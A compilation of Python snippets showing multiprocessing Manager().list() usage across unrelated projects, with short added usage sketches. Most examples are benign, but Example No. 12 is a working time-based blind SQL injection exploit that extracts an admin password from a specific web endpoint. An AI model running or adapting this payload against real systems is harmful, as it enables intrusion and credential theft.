Example No. 1
    def run(self, job_name):
        """
        This method is used to create a job, validate it and run it on remote nodes

        :param job_name: name of the job to create
        :return:
        """
        job_metadata = self.batch_config.get('job-metadata')[job_name]
        all_job_ids = Manager().list()
        cluster_name = job_metadata['slurm_cluster_name']
        slurm_cluster = self.batch_config.get('slurm_cluster').get(cluster_name)
        path = path_expand(slurm_cluster['credentials']['sshconfigpath'])

        ssh_caller = lambda *x: self._ssh(slurm_cluster['name'], path, *x)
        scp_caller = lambda *x: self._scp(slurm_cluster['name'], path, *x)


        # TODO replace with .format
        ssh_caller('cd %s && mkdir job%s' % (job_metadata['raw_remote_path'], job_metadata['suffix']), True)
        scp_caller(job_metadata['slurm_script_path'],
                   '%s:%s' % (slurm_cluster['name'], job_metadata['remote_slurm_script_path']))
        scp_caller(job_metadata['job_script_path'],
                   '%s:%s' % (slurm_cluster['name'], job_metadata['remote_script_path']))
        ssh_caller('chmod +x', job_metadata['remote_script_path'])
        if job_metadata['input_type'].lower() == 'params+file':
            scp_caller(job_metadata['argfile_path'], '%s:%s' % (slurm_cluster['name'], job_metadata['remote_path']))

        remote_job_id = ssh_caller("cd %s && qsub %s && qstat -u $USER | tail -n 1 | awk '{print $1}'" %
                                   (job_metadata['remote_path'], job_metadata['remote_slurm_script_path']))
        remote_job_id = remote_job_id.strip('\n')
        all_job_ids.append(remote_job_id)
        print('Remote job ID: %s' % remote_job_id)
        self.batch_config.deep_set(['job-metadata', job_name, 'jobIDs'], [pid for pid in all_job_ids])
Example No. 2
class Family(object):
    def __init__(
            self,
            last_name,
            synchronized_approach=SynchronizedListImplementation.THREAD_LOCK):
        print('Create a new family object')
        self._last_name = last_name
        self.synchronized_approach = synchronized_approach
        if self.synchronized_approach == SynchronizedListImplementation.MULTIPROCESSING_MANAGER:
            self._members = Manager().list()
        else:
            self._members = []
            self._lock = threading.Lock()
        self._cnt = 0

    def Add(self, first_name):
        # if self.synchronized_approach == SynchronizedListImplementation.THREAD_LOCK:
        #   self._lock.acquire()
        name = Name(first_name, self._last_name)
        if name not in self._members:
            self._members.append(name)
            # if self.synchronized_approach == SynchronizedListImplementation.THREAD_LOCK:
            #   self._lock.release()

    @property
    def last_name(self):
        return self._last_name

    @last_name.setter
    def last_name(self, value):
        self._last_name = value

    def __str__(self):
        return '%s Family:\n%s' % (self._last_name, '\n'.join(
            [str(name) for name in self._members]))
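A brief usage sketch for the Family class above (not part of the original example); it assumes SynchronizedListImplementation, Name, threading, and Manager are defined or imported by the surrounding module, as the constructor implies.

# Hypothetical usage of the Family class defined above.
family = Family(
    'Smith',
    synchronized_approach=SynchronizedListImplementation.MULTIPROCESSING_MANAGER)
family.Add('Alice')   # appended to the Manager().list() proxy
family.Add('Alice')   # duplicate; skipped only if Name defines value equality
family.Add('Bob')
print(family)         # "Smith Family:" followed by one Name per line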
Example No. 3
class ParserBithumb:
    def __init__(self, conf: dict):
        self.url = conf['url']
        self.currency = conf['currency']
        self.table = 'crypto'
        self.items = Manager().list()

    def parse(self, curr: str):
        response = requests.get(self.url + curr)
        result = response.json()["data"]

        item = dict(
            exchange="bithumb",
            name=curr.lower(),
            price=int(result["closing_price"]),
            volume=round(float(result["units_traded"])),
            date=convert_timestamp_mills(result['date'])
        )
        self.items.append(item)

    def get_items(self) -> List[dict]:
        procs = []
        for _index, curr in enumerate(self.currency):
            proc = Process(target=self.parse, args=(curr,))
            procs.append(proc)
            proc.start()

        for proc in procs:
            proc.join()

        return self.items
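The same fan-out pattern recurs in most of the snippets on this page: create a Manager().list() proxy, start one Process per work item that appends its result, join the workers, then read the proxy back in the parent. A minimal, self-contained sketch of that pattern (the worker function and inputs are illustrative only):

# Minimal sketch of the shared-list pattern used by ParserBithumb above.
from multiprocessing import Manager, Process

def square(shared, value):
    # The proxy forwards each append to the manager process.
    shared.append(value * value)

if __name__ == '__main__':
    shared = Manager().list()
    procs = [Process(target=square, args=(shared, v)) for v in range(4)]
    for p in procs:
        p.start()
    for p in procs:
        p.join()
    print(list(shared))  # e.g. [0, 1, 4, 9]; order depends on scheduling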
Example No. 4
class MemStorage:
    def __init__(self, config):
        self.config = config
        self.measures = Manager().list()

    def __enter__(self):
        return self

    def __exit__(self, exc_type, exc_value, traceback):
        pass

    def save(self, measure):
        self.measures.append(measure)

    def last(self):
        if len(self.measures) <= 0:
            return None

        return self.measures[-1]

    def __str__(self):
        buf = "<{} measures: [".format(self.__class__)
        for item in self.measures:
            buf += "'{}'".format(item)
        buf += "]>"

        return buf
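A short usage sketch for MemStorage (not from the original source); the config argument is opaque in this snippet, so an empty dict is assumed purely for illustration.

# Illustrative use of the MemStorage context manager above.
with MemStorage(config={}) as storage:
    storage.save(21.5)
    storage.save(22.0)
    print(storage.last())  # 22.0 (the most recent measure on the shared list)
    print(storage)         # <class '...MemStorage'> measures: ['21.5''22.0']>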
Example No. 5
def train(target, workers, title):
    parents, childs = zip(*[Pipe() for _ in range(2)])

    population = Manager().list()
    population.append(workers[0])
    population.append(workers[1])

    processes = []
    for i in range(0, 2):
        processes.append(
            Process(target=target, args=(i, population, childs[i])))

    # Start the process’s activity.
    for process in processes:
        process.start()

    params_x = []
    params_y = []

    for i in range(0, 2):
        params_store = parents[i].recv()
        params_x.append([params[0] for params in params_store])
        params_y.append([params[1] for params in params_store])

    plot(params_x, params_y, title)

    # Block the calling thread until the process whose join() method is called terminates
    for process in processes:
        process.join()

    print(population[0].performance)
    print(population[1].performance)
Example No. 6
class ParserKorbit:
    def __init__(self, conf: dict):
        self.url = conf['url']
        self.currency = conf['currency']
        self.table = 'crypto'
        self.items = Manager().list()

    def parse(self, curr: str):
        params = {"currency_pair": curr}
        response = requests.get(self.url, params)
        result = response.json()

        item = dict(exchange="korbit",
                    name=curr.replace("_krw", ""),
                    price=int(result["last"]),
                    volume=round(float(result["volume"])),
                    date=convert_timestamp_mills(result['timestamp']))
        self.items.append(item)

    def get_items(self) -> List[dict]:
        procs = []
        for _index, curr in enumerate(self.currency):
            proc = Process(target=self.parse, args=(curr, ))
            procs.append(proc)
            proc.start()

        for proc in procs:
            proc.join()

        return self.items
Example No. 7
    def sampleWithDistInfo_boundStrat_multiThread(self, num):
        """Randomly sample one configuration in the c-space first (get a sphere),
        then add the sphere to the result set.
        Repeat:
            sample the boundary of the sphere set,
            add the new sphere to the set
        until the total number of spheres reaches ``num``.

        @param num: Total number of spheres as a terminate condition.
                    TODO: find a terminate condition that can be used to evaluate sphere coverage
        """
        try:
            # self.mDistSamples = Manager().list()
            self.g_failTimes.value = 0
            boundaryQueue = multiprocessing.Queue()
            dictProxy = Manager().list()
            dictProxy.append({})

            threads = []
            threadsCount = 1
            for i in range(0, threadsCount):
                newThread = Process(target=self.__mltithreadDistSample_boundStrat__,
                                    args=[i, dictProxy, boundaryQueue, num])
                threads += [newThread]
            for i in range(0, threadsCount):
                threads[i].start()
            for i in range(0, threadsCount):
                threads[i].join()

            print("Got {0} samples".format(len(self.mDistSamples)))

        except Exception as msg:
            print("Failed to start a process, MSG:\n\t" + str(msg))
            self.g_failTimes.value = 0
Example No. 8
def run_everything():
    setting = get_project_settings()
    # process = CrawlerProcess(setting)
    alreadyUsedWord = Manager().list()
    notYetUsedWord = Manager().list()
    roundCount = 0
    # get json, input the search value from flask to here.
    search_field = sys.argv[1]
    engine = db_connect()
    Session = sessionmaker(bind=engine)
    session = Session()
    initialNewsCount = 0
    duplicateCountBeforeBreak = 0
    while True:
        alreadyUsedWord.append(search_field)
        run_spider('thai_spider', setting, search_field, alreadyUsedWord,
                   notYetUsedWord)
        session.commit()
        newsCount = session.query(func.count(News.id)).scalar()

        print('total news in db is ' + str(newsCount))
        roundCount += 1
        if newsCount - initialNewsCount < 3:
            print("Too low news now let's stop")
            duplicateCountBeforeBreak += 1
            if duplicateCountBeforeBreak >= 2:
                break
        else:
            initialNewsCount = newsCount
            duplicateCountBeforeBreak = 0
        if len(notYetUsedWord) == 0:
            break
        search_field = notYetUsedWord.pop()
Example No. 9
def train(plasfile,
          chromfile,
          outdir,
          num_procs,
          ks=[3, 4, 5, 6, 7],
          lens=[1000, 10000, 100000, 500000]):
    ''' Train PlasClass models
    '''
    print("Starting PlasClass training")
    print("Getting reference lengths")
    chrom_names, chrom_lengths = get_seq_lengths(chromfile)
    plas_names, plas_lengths = get_seq_lengths(plasfile)
    for l in lens:
        coverage = 5  # TODO: make this command line option
        num_frags = get_num_frags(plas_lengths, l, coverage)

        print("Sampling {} fragments for length {}".format(num_frags, l))
        plas_start_inds = get_start_inds(plas_names, plas_lengths, num_frags,
                                         l)
        chrom_start_inds = get_start_inds(chrom_names, chrom_lengths,
                                          num_frags, l)
        plas_seqs = get_seqs(plasfile, plas_start_inds, l)
        chrom_seqs = get_seqs(chromfile, chrom_start_inds, l)

        print("Getting k-mer frequencies")
        kmer_inds, kmer_count_lens = utils.compute_kmer_inds(ks)

        pool = mp.Pool(num_procs)
        plas_list = Manager().list()
        for cur in np.arange(len(plas_seqs)):
            plas_list.append(0)
        pool.map(utils.count_kmers, [[ind,s, ks, kmer_inds, kmer_count_lens, plas_list] \
                                        for ind,s in enumerate(plas_seqs)])
        plas_freqs = np.array(plas_list)

        chrom_list = Manager().list()
        for cur in np.arange(len(chrom_seqs)):
            chrom_list.append(0)
        pool.map(utils.count_kmers, [[ind, s, ks, kmer_inds, kmer_count_lens, chrom_list] \
                                        for ind,s in enumerate(chrom_seqs)])
        chrom_freqs = np.array(chrom_list)

        pool.close()

        print("Learning classifier")
        plas_labels = np.ones(plas_freqs.shape[0])
        chrom_labels = np.zeros(chrom_freqs.shape[0])
        data = np.concatenate((plas_freqs, chrom_freqs))
        labels = np.concatenate((plas_labels, chrom_labels))
        scaler = StandardScaler().fit(data)
        scaled = scaler.transform(data)
        clf = LogisticRegression(solver='liblinear').fit(scaled, labels)

        print("Saving classifier")
        clf_name = 'm' + str(l)
        scaler_name = 's' + str(l)
        dump(clf, os.path.join(outdir, clf_name))
        dump(scaler, os.path.join(outdir, scaler_name))
Example No. 10
class Painter():
    def __init__(self,
                 repr=[
                     'Ax', 'Ay', 'Az', 'Gx', 'Gy', 'Gz', 'Mx', 'My', 'Mz',
                     'Q1', 'Q2', 'Q3', 'Q4', 'Y', 'P', 'R'
                 ],
                 display=None,
                 memorySize=10,
                 ylim=[-200, 200]):
        self.n = len(repr)
        self.repr = repr
        if display is None:
            self.display = list(range(self.n))
        else:
            self.display = display
        self.memorySize = memorySize
        if isinstance(ylim, numbers.Number):
            self.ylim = (-ylim, ylim)
        else:
            self.ylim = ylim
        self.data = Manager().list(
            [np.zeros(self.n) for i in range(self.memorySize)])

        self.process = None
        self.animation = None
        self.line = [None for i in range(self.n)]

    def __call__(self, data):
        self.data.append(data)

    def plot(self):
        self.process = mp.Process(target=self._plot)
        self.process.start()

    def _plot(self):
        fig = plt.figure()
        self.animation = animation.FuncAnimation(fig=fig,
                                                 func=self._update,
                                                 init_func=self._init,
                                                 interval=20,
                                                 blit=False)
        plt.show()

    def save(self, path):
        self.animation.save(path, fps=30, extra_args=['-vcodec', 'libx264'])

    def _init(self):
        data = np.array(self.data)[-self.memorySize:]
        for i in self.display:
            self.line[i] = plt.plot(data[:, i], label=self.repr[i])[0]
        plt.xlim((0, self.memorySize))
        plt.ylim(self.ylim)
        plt.legend(loc='upper right')

    def _update(self, index):
        data = np.array(self.data)[-self.memorySize:]
        for i in self.display:
            self.line[i].set_ydata(data[:, i])
Example No. 11
class Result:
    def __init__(self, urls_detail: dict, finished_urls: list,
                 failed_urls: list, config: Config, start_time, initial_time,
                 end_time):
        self.urls_detail = Manager().dict()
        self.urls_detail.update(urls_detail)
        self.finished_urls = Manager().list()
        self.finished_urls.extend(finished_urls)
        self.failed_urls = Manager().list()
        self.failed_urls.extend(failed_urls)
        self.config = copy.deepcopy(config)
        self.start_time = start_time
        self.initial_time = initial_time
        self.end_time = end_time

    def get_failed_urls(self):
        return self.failed_urls

    def get_finished_urls(self):
        return self.finished_urls

    def get_urls_detail_dict(self):
        return self.urls_detail

    def retry_failed_urls(self, *new_config: Config):
        if len(self.failed_urls) == 0:
            print("no failed urls")
            return True
        config = copy.deepcopy(new_config[0] if len(new_config) ==
                               1 else self.config)
        if len(new_config) == 1:
            config.list_config()
        retry_downloader = Downloader(config)
        result = retry_downloader.get_result(self.failed_urls)
        self.failed_urls = result.failed_urls
        for url in result.finished_urls:
            self.finished_urls.append(url)
        self.urls_detail.update(result.urls_detail)
        return True

    def show_time_cost(self):
        time_cost = '\n'.join([
            'initialize download tasks cost: {:.2f}s'.format(
                self.initial_time - self.start_time),
            'finish download task cost: {:.2f}s'.format(self.end_time -
                                                        self.initial_time),
            'total cost: {:.2f}s'.format(self.end_time - self.start_time)
        ])
        print(time_cost)

    def show_urls_status(self):
        urls_status = '|'.join([
            'finished: ' + str(len(self.finished_urls)),
            'failed: ' + str(len(self.failed_urls)),
            'total: ' + str(len(self.finished_urls) + len(self.failed_urls))
        ])
        print(urls_status)
Example No. 12
class GuessPassword(object):
    def __init__(self, passwd_length, processes=6, timeout=3):
        self.result = Manager().dict()
        self.stop_flag = Manager().list()
        self.worker_list = []
        self.processes = processes
        self.timeout = timeout
        self.queue = Queue()
        self.lock = RLock()
        self.cookie = {'_SERVER': ''}
        self.passwd_length = passwd_length
        self.url = "http://localhost/general/document/index.php/send/approve/finish"
        self.payload = "1) and char(@`'`)  union select if(ord(mid(PASSWORD,{position},1))={guess_char},sleep(4),1),1 from user WHERE BYNAME = 0x61646d696e #and char(@`'`)"

        self.stop_flag.append(False)  # cannot write self.stop_flag[0] = False here, otherwise it raises an index-out-of-range error
        for _ in range(1, self.passwd_length):
            self.queue.put(_)

    def exploit(self):
        while not self.queue.empty() and not self.stop_flag[0]:
            passwd_position = self.queue.get()
            for _guess_char in range(33, 128):
                payload = self.payload.format(position=passwd_position, guess_char=_guess_char)
                exp_data = {'sid': payload}
                try:
                    res = requests.post(self.url, data=exp_data, cookies=self.cookie, timeout=self.timeout)
                except requests.ReadTimeout:
                    self.lock.acquire()
                    self.result[passwd_position] = chr(_guess_char)
                    print "Data %dth: %s" % (passwd_position, self.result[passwd_position])
                    self.lock.release()
                    break

    def run(self):

        for _ in range(self.processes):
            _worker = Process(target=self.exploit)
            # _worker.daemon = True
            _worker.start()

        try:
            # Why > 2 instead of > 0? When all worker subprocesses have finished, two child
            # processes are still running: the two Manager subprocesses (used to share data
            # across processes). multiprocessing.active_children() returns a list of the
            # currently active child process objects.
            while len(multiprocessing.active_children()) > 2:
                # self.lock.acquire()
                # print len(multiprocessing.active_children())
                # self.lock.release()
                time.sleep(1)
        except KeyboardInterrupt:
            self.lock.acquire()
            print('waiting for all subprocesses to stop...')
            self.stop_flag[0] = True
            self.lock.release()

        else:
            print(self.result)
            print('finish')
Example No. 13
    def _get_ruuvitag_datas(macs=[],
                            search_duratio_sec=None,
                            run_flag=RunFlag(),
                            bt_device=''):
        """
        Get data from BluetoothCommunication and handle data encoding.

        Args:
            macs (list): MAC addresses. Default empty list
            search_duratio_sec (int): Search duration in seconds. Default None
            run_flag (object): RunFlag object. Function executes while run_flag.running.
                               Default new RunFlag
            bt_device (string): Bluetooth device id
        Yields:
            tuple: MAC and State of RuuviTag sensor data
        """

        mac_blacklist = Manager().list()
        start_time = time.time()
        data_iter = ble.get_datas(mac_blacklist, bt_device)

        for ble_data in data_iter:
            # Check duration
            if search_duratio_sec and time.time(
            ) - start_time > search_duratio_sec:
                data_iter.send(StopIteration)
                break
            # Check running flag
            if not run_flag.running:
                data_iter.send(StopIteration)
                break
            # Check MAC whitelist if advertised MAC available
            if ble_data[0] and macs and not ble_data[0].upper() in map(
                    str.upper, macs):
                continue

            (data_format, data) = DataFormats.convert_data(ble_data[1])
            # Check that encoded data is valid RuuviTag data and it is sensor data
            # If data is not valid RuuviTag data add MAC to blacklist if MAC is available
            if data is not None:
                decoded = get_decoder(data_format).decode_data(data)
                if decoded is not None:
                    # If advertised MAC is missing, try to parse it from the payload
                    mac = ble_data[0] if ble_data[0] else \
                        parse_mac(data_format, decoded['mac']) if decoded['mac'] else None
                    # Check whitelist using MAC from decoded data if advertised MAC is not available
                    if mac and macs and mac.upper() not in map(
                            str.upper, macs):
                        continue
                    yield (mac, decoded)
                else:
                    log.error('Decoded data is null. MAC: %s - Raw: %s',
                              ble_data[0], ble_data[1])
            else:
                if ble_data[0]:
                    mac_blacklist.append(ble_data[0])
Example No. 14
def generate_permuted_matrices(file_name, n_start, n_end, p_factor, sa_factor, use_cache):
    mat = pd.read_csv(os.path.join(constants.DATASETS_FOLDER, "{}.tsv".format(file_name)), sep='\t', index_col=0)
    p = Pool(p_factor)
    arr=Manager().list([])
    params = []
    mat[pd.isna(mat)] = 0  # MODIFY THIS LINE
    for a in np.arange(n_start,n_end):
        if use_cache and os.path.exists(os.path.join(constants.CACHE_FOLDER, file_name, "{}_perm_{}.tsv".format(file_name, a))):
            arr.append(1)
        else:
            params.append([mat, file_name, sa_factor, a, arr])

    print "permuting {}/{} matrices ({} exist in cache)".format(n_end-n_start-len(arr), n_end-n_start, len(arr))
    p.map(permute_matrix, params)
Example No. 15
def run(dir_name, device_mac, script_dir, previous_info, num_proc):
    global filenames

    print("    Reading the destination info...")
    read_dst_csv(result=previous_info)
    print("    Reading common protocol and port info...")
    read_protocol_csv(script_dir + "/protocol_analysis/protocols_info.csv")

    print("    Analyzing the protocol and port of each packet...")

    results = Manager().list()
    for i in range(num_proc):
        filenames.append([])
        results.append([])

    index = 0
    for root, dirs, files in os.walk(dir_name):
        for filename in files:
            if filename.endswith(".pcap") and not filename.startswith("."):
                filenames[index].append(root + "/" + filename)
                index += 1
                if index >= num_proc:
                    index = 0

    procs = []
    pid = 0
    for i in range(num_proc):
        p = Process(target=dst_protocol_analysis,
                    args=(pid, device_mac, results))
        procs.append(p)
        p.start()
        pid += 1

    for p in procs:
        p.join()

    combined_results = results[0]

    for i in range(num_proc - 1):
        dst_pro_arr = results[i + 1]

        for dst_pro in dst_pro_arr:
            if dst_pro in combined_results:
                index = combined_results.index(dst_pro)
                combined_results[index].add_all(dst_pro.snd, dst_pro.rcv,
                                                dst_pro.p_snd, dst_pro.p_rcv)
            else:
                combined_results.append(dst_pro)

    return combined_results
Example No. 16
 def cluster_to_hotspot(self, texts_list, top_k, kw_num, text_sim_threshold,
                        topic_sim_threshold) -> List[Hotspot]:
     texts_list = split_list(texts_list, self.process_num)
     model_list = [
         TextClusterModel(texts=texts_list[i],
                          vec_model=self.w2v_model,
                          kw_num=kw_num,
                          sim_threshold=text_sim_threshold)
         for i in range(self.process_num)
     ]
     shared_res_list = Manager().list([])
     p_list = [
         Process(target=m.cluster_to, args=(shared_res_list, ))
         for m in model_list
     ]
     [p.start() for p in p_list]
     [p.join() for p in p_list]
     # 3. hotspot cluster
     logger.info('{} processes finished, shared_res_list length:{}'.format(
         self.process_num, len(shared_res_list)))
     while len(shared_res_list) > 1:
         model_list = []
         p_list = []
         single_hotspots = None
         for i in range(0, len(shared_res_list), 2):
             try:
                 model_list.append(
                     HotspotClusterModel(
                         hotspots_1=shared_res_list[i],
                         hotspots_2=shared_res_list[i + 1],
                         sim_threshold=topic_sim_threshold,
                     ))
             except Exception as e:
                 single_hotspots = shared_res_list[-1]
         shared_res_list = Manager().list([])
         if single_hotspots is not None:
             shared_res_list.append(single_hotspots)
         for model in model_list:
             p_list.append(
                 Process(target=model.cluster_to, args=(shared_res_list, )))
         [p.start() for p in p_list]
         [p.join() for p in p_list]
         logger.info('Shared_res_list length:{}'.format(
             self.process_num, len(shared_res_list)))
     logger.info('Shared_res_list length:{}'.format(self.process_num,
                                                    len(shared_res_list)))
     return sorted(shared_res_list[0], key=lambda x: x.ranks,
                   reverse=True)[:top_k]
Example No. 17
def LDA_topic_modeller_by_quarter_by_brand_multiprocessing(
        DF, LIST_OF_ADDITIONAL_STOP_WORDS, LIST_OF_COMMON_WORDS,
        number_of_topics_range):
    #Read in processed documents from cache, or process new document
    if os.path.isfile('pickle_files/{}.pickle'.format(
            'processed_data_by_quarter')) and os.path.isfile(
                'pickle_files/{}.pickle'.format(
                    'processed_data_by_quarter_by_brand')):
        with open(
                'pickle_files/{}.pickle'.format(
                    'processed_data_by_quarter_by_brand'), 'rb') as handle_2:
            dict_of_clean_doc_by_quarter_by_brand = pickle.load(handle_2)
    else:
        _, dict_of_clean_doc_by_quarter_by_brand = Preprocessing(
            DF, LIST_OF_ADDITIONAL_STOP_WORDS, LIST_OF_COMMON_WORDS)

    #Generate list of quarters
    DF['Date'] = pd.to_datetime(DF['Date'], infer_datetime_format=True)
    DF['Y-Quarter'] = DF['Date'].dt.to_period("Q")
    list_of_quarters = DF['Y-Quarter'].unique()

    #Limit quarters to those in 2016, 2017, 2018
    list_of_years_to_include = ['2016', '2017', '2018']
    list_of_quarters = [
        quarter for quarter in list_of_quarters
        if any(year in str(quarter) for year in list_of_years_to_include)
    ]

    combination_of_brands = []
    for quarter in list_of_quarters:
        combination_of_brands += list(
            itertools.product(
                [str(quarter)],
                dict_of_clean_doc_by_quarter_by_brand[str(quarter)].keys()))

    from multiprocessing import Pool, cpu_count, Manager
    print("{} products found... ".format(str(len(combination_of_brands))))
    list_of_arguments = [(dict_of_clean_doc_by_quarter_by_brand,
                          str(quarter_brand[0]), quarter_brand[1],
                          number_of_topics_range)
                         for quarter_brand in combination_of_brands]

    output_df = Manager().list()

    with Pool(processes=cpu_count() * 2) as pool:
        review_df = pool.starmap(build_single_LDA_model, list_of_arguments)

    output_df.extend(review_df)

    pool.terminate()
    pool.join()
    output_df = pd.concat(list(output_df), ignore_index=True)

    writer = pd.ExcelWriter(
        'topic model results/LDA Topic Model by Quarter by Brand.xlsx')
    output_df.to_excel(writer, 'Topic Model by Quarter by Brand')
    writer.save()
    writer.close()
    return
Example No. 18
class thread(threading.Thread):
    def __init__(self, c0):
        threading.Thread.__init__(self)
        self.flag = True
        self.l = Manager().list()
        self.l.append(0)
        self.l.append(1)
        self.l.append('ss')
        self.c0 = c0  # save the end of the pipe

    def run(self):
        self.p = Process(target=f, args=(
            self.l,
            self.c0,
        ))  # start a looping process with the pipe - goes to line 5
        self.p.start()
        self.p.join()
Example No. 19
class Storage(object):
    def __init__(self,
                 maxsize,
                 storage_batchs,
                 num_speakers_in_batch,
                 num_threads=8):
        # use a multiprocessing Manager list for thread safety
        self.storage = Manager().list()
        self.maxsize = maxsize
        self.num_speakers_in_batch = num_speakers_in_batch
        self.num_threads = num_threads
        self.ignore_last_batch = False

        if storage_batchs >= 3:
            self.ignore_last_batch = True

        # used for fast random sample
        self.safe_storage_size = self.maxsize - self.num_threads
        if self.ignore_last_batch:
            self.safe_storage_size -= self.num_speakers_in_batch

    def __len__(self):
        return len(self.storage)

    def full(self):
        return len(self.storage) >= self.maxsize

    def append(self, item):
        # if storage is full, remove an item
        if self.full():
            self.storage.pop(0)

        self.storage.append(item)

    def get_random_sample(self):
        # safe storage size considering all threads remove one item from storage in same time
        storage_size = len(self.storage) - self.num_threads

        if self.ignore_last_batch:
            storage_size -= self.num_speakers_in_batch

        return self.storage[random.randint(0, storage_size)]

    def get_random_sample_fast(self):
        """Call this method only when storage is full"""
        return self.storage[random.randint(0, self.safe_storage_size)]
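A usage sketch for the Storage buffer above (not from the original source); the sizes are arbitrary and chosen only so the fast sampling path is safe once the buffer is full.

# Illustrative use of Storage; maxsize, storage_batchs, num_speakers_in_batch
# and num_threads are arbitrary example values.
storage = Storage(maxsize=32, storage_batchs=4,
                  num_speakers_in_batch=8, num_threads=8)
for i in range(40):              # more appends than maxsize: oldest items are popped
    storage.append(i)
print(len(storage))                       # 32
print(storage.get_random_sample_fast())   # safe only because the storage is full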
Example No. 20
def run():
    # make sure no old procs left running
    os.system('taskkill /F /IM plugin-container.exe')
    os.system('taskkill /F /IM firefox.exe')
    os.system('taskkill /F /IM geckodriver.exe')
    os.system('taskkill /F /IM helper.exe')

    bot_creds_list = []  # bot credentials, format: 'login:password:port'
    with open('creds_list.txt', 'r') as infile:
        for line in infile:
            line = line.strip()
            if line:
                bot_creds_list.append(line)

    # launch redis cache server
    run_redis_srv()

    # populate companies list from file
    companies_list = Manager().list()
    with open('companies_list_filtered.txt') as infile:
        for cid in infile:
            cid = cid.strip()
            if cid:
                companies_list.append(cid)

    proc_list = []

    # set to limit max bots from creds_list[]
    limit = len(bot_creds_list)

    for bot_creds in bot_creds_list[0:limit]:
        worker_proc = Process(target=worker,
                              args=(
                                  companies_list,
                                  bot_creds,
                              ))
        proc_list.append(worker_proc)

    for worker_num, worker_proc in enumerate(proc_list):
        worker_proc.start()
        print('started worker: %s' % worker_num)
        time.sleep(random.randint(55, 65))

    for worker_num, worker_proc in enumerate(proc_list):
        worker_proc.join()
        print('joined worker: %s' % worker_num)
Example No. 21
class Scanner(object):
    def __init__(self):
        self.task = Manager().list()
        self.outputer = Outputer()

    def add_task(self, root_domain, domain, s_type):
        t = (root_domain, domain, s_type)
        self.task.append(t)
        print(self.task)
        return

    def check_network(self, domain):
        domain = "http://" + domain
        res, code, error = my_request(domain)
        if not error:
            return True
        else:
            warning = str(error)
            print(warning)
            return False


#	def get_ip(self, domain):
#		import socket
#		ip =  socket.getaddrinfo(domain, 'http')[0][4][0]
#		return str(ip)

    def _get_ip(self, domain):
        retry = 3
        ip = None
        num = 0
        api = "http://ip-api.com/json/%s?lang=en" % domain
        while num != retry:
            try:
                res = urllib2.urlopen(api).read()
                ip = json.loads(res)["query"].encode('utf8')
                if re.match("\d+\.\d+\.\d+\.\d+", ip):
                    break
                else:
                    num += 1
            except Exception as e:
                print(e)
                #print "[-] Get ip error : Network error"
                num += 1
        return ip
Example No. 22
class Analyzer(object):
    def __init__(self, num_proc, path_to_data):
        self.num_proc = num_proc
        self.path_to_data = path_to_data
        self.global_lst = Manager().list()
        self.topic_lst = os.listdir(path_to_data)
        if ((len(self.topic_lst) / num_proc) -
                (len(self.topic_lst) // num_proc) != 0):
            self.size_group = (len(os.listdir(path_to_data)) // num_proc) + 1
        else:
            self.size_group = (len(os.listdir(path_to_data)) // num_proc)
        for i in range(len(self.topic_lst)): self.global_lst.append([10])

    def analyzer(self, index_process):
        for i in range(self.size_group * index_process,
                       self.size_group * (index_process + 1)):
            buffer_str = ""
            if i < len(self.topic_lst):
                filename_lst = os.listdir(self.path_to_data + '/' + self.topic_lst[i])
                for text in filename_lst:
                    with open(self.path_to_data + '/' + self.topic_lst[i] + '/' + text, 'r') as file:
                        buffer_str += file.read().lower()
                words_lst = re.split(r'\W| ', buffer_str)
                words_lst = list(set(words_lst))
                words_lst = list(filter(None, words_lst))
                self.global_lst[i] = words_lst

    def determine_topic(self, filename):
        buffer_str = ""
        with open(filename, 'r') as file:
            buffer_str = file.read().lower()
        words_lst = re.split(r'\W| ', buffer_str)
        words_lst = list(set(words_lst))
        words_lst = list(filter(None, words_lst))
        result_lst = [0 for i in range(len(self.topic_lst))]
        for index_topic in range(len(self.topic_lst)):
            result_lst[index_topic] = len(self.global_lst[index_topic]) - \
                                      len(set(self.global_lst[index_topic]) - set(words_lst))
        return self.topic_lst[result_lst.index(max(result_lst))]

    def start_process(self):
        proc_lst = [Process(target=self.analyzer, args=(i,)) for i in range(self.num_proc)]
        for i in proc_lst: i.start()
        for i in proc_lst: i.join()
Example No. 23
    def _fit(self,
             input_data: InputData,
             use_fitted_operations=False,
             process_state_dict: Manager = None,
             fitted_operations: Manager = None):
        """
        Run training process in all nodes in pipeline starting with root.

        :param input_data: data used for operation training
        :param use_fitted_operations: flag defining whether to use saved information about previous executions or not,
        default False
        :param process_state_dict: this dictionary is used for saving required pipeline parameters (which were changed
        inside the process) in a case of operation fit time control (when process created)
        :param fitted_operations: this list is used for saving fitted operations of pipeline nodes
        """

        # InputData was set directly to the primary nodes
        if input_data is None:
            use_fitted_operations = False
        else:
            use_fitted_operations = self._fitted_status_if_new_data(
                new_input_data=input_data, fitted_status=use_fitted_operations)

            if not use_fitted_operations or not self.fitted_on_data:
                # Don't use previous information
                self.unfit()
                self.update_fitted_on_data(input_data)

        with Timer(log=self.log) as t:
            computation_time_update = not use_fitted_operations or not self.root_node.fitted_operation or \
                                      self.computation_time is None

            train_predicted = self.root_node.fit(input_data=input_data)
            if computation_time_update:
                self.computation_time = round(t.minutes_from_start, 3)

        if process_state_dict is None:
            return train_predicted
        else:
            process_state_dict['train_predicted'] = train_predicted
            process_state_dict['computation_time'] = self.computation_time
            process_state_dict['fitted_on_data'] = self.fitted_on_data
            for node in self.nodes:
                fitted_operations.append(node.fitted_operation)
Example No. 24
class Parallel(object):
    """
    generate samples from some data structure
    """
    def __init__(self, objective, objective_kwargs):
        self.objective = objective
        self.objective_kwargs = objective_kwargs
        return

    def run(self, iterable_obj, n_jobs=-1):

        try:
            iter(iterable_obj)
        except Exception as e:
            raise Exception(e.__str__())

        self.X = Manager().list()
        if n_jobs == -1:
            import multiprocessing
            n_jobs = multiprocessing.cpu_count()
        pool = Pool(n_jobs)

        params = []
        for item in iterable_obj:
            params.append((item, ))
        pool.starmap(self.worker, params)
        pool.close()
        pool.join()
        return list(self.X)

    def worker(self, item):
        try:
            d_ = self.objective(item, **self.objective_kwargs)

            if type(d_) == dict:
                self.X.append(d_)
            elif type(d_) == list:
                for d_i_ in d_:
                    self.X.append(d_i_)
            else:
                raise TypeError(
                    'objective did not return a dict object or a dict list')
        except Exception as e:
            raise Exception(e.__str__())
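A hypothetical usage sketch for the Parallel helper above; square and its offset keyword are made up for illustration, and the objective is assumed to be a picklable, module-level function.

# Illustrative use of Parallel; results are collected via the Manager().list() proxy.
def square(item, offset=0):
    return {'item': item, 'value': item * item + offset}

if __name__ == '__main__':
    runner = Parallel(objective=square, objective_kwargs={'offset': 1})
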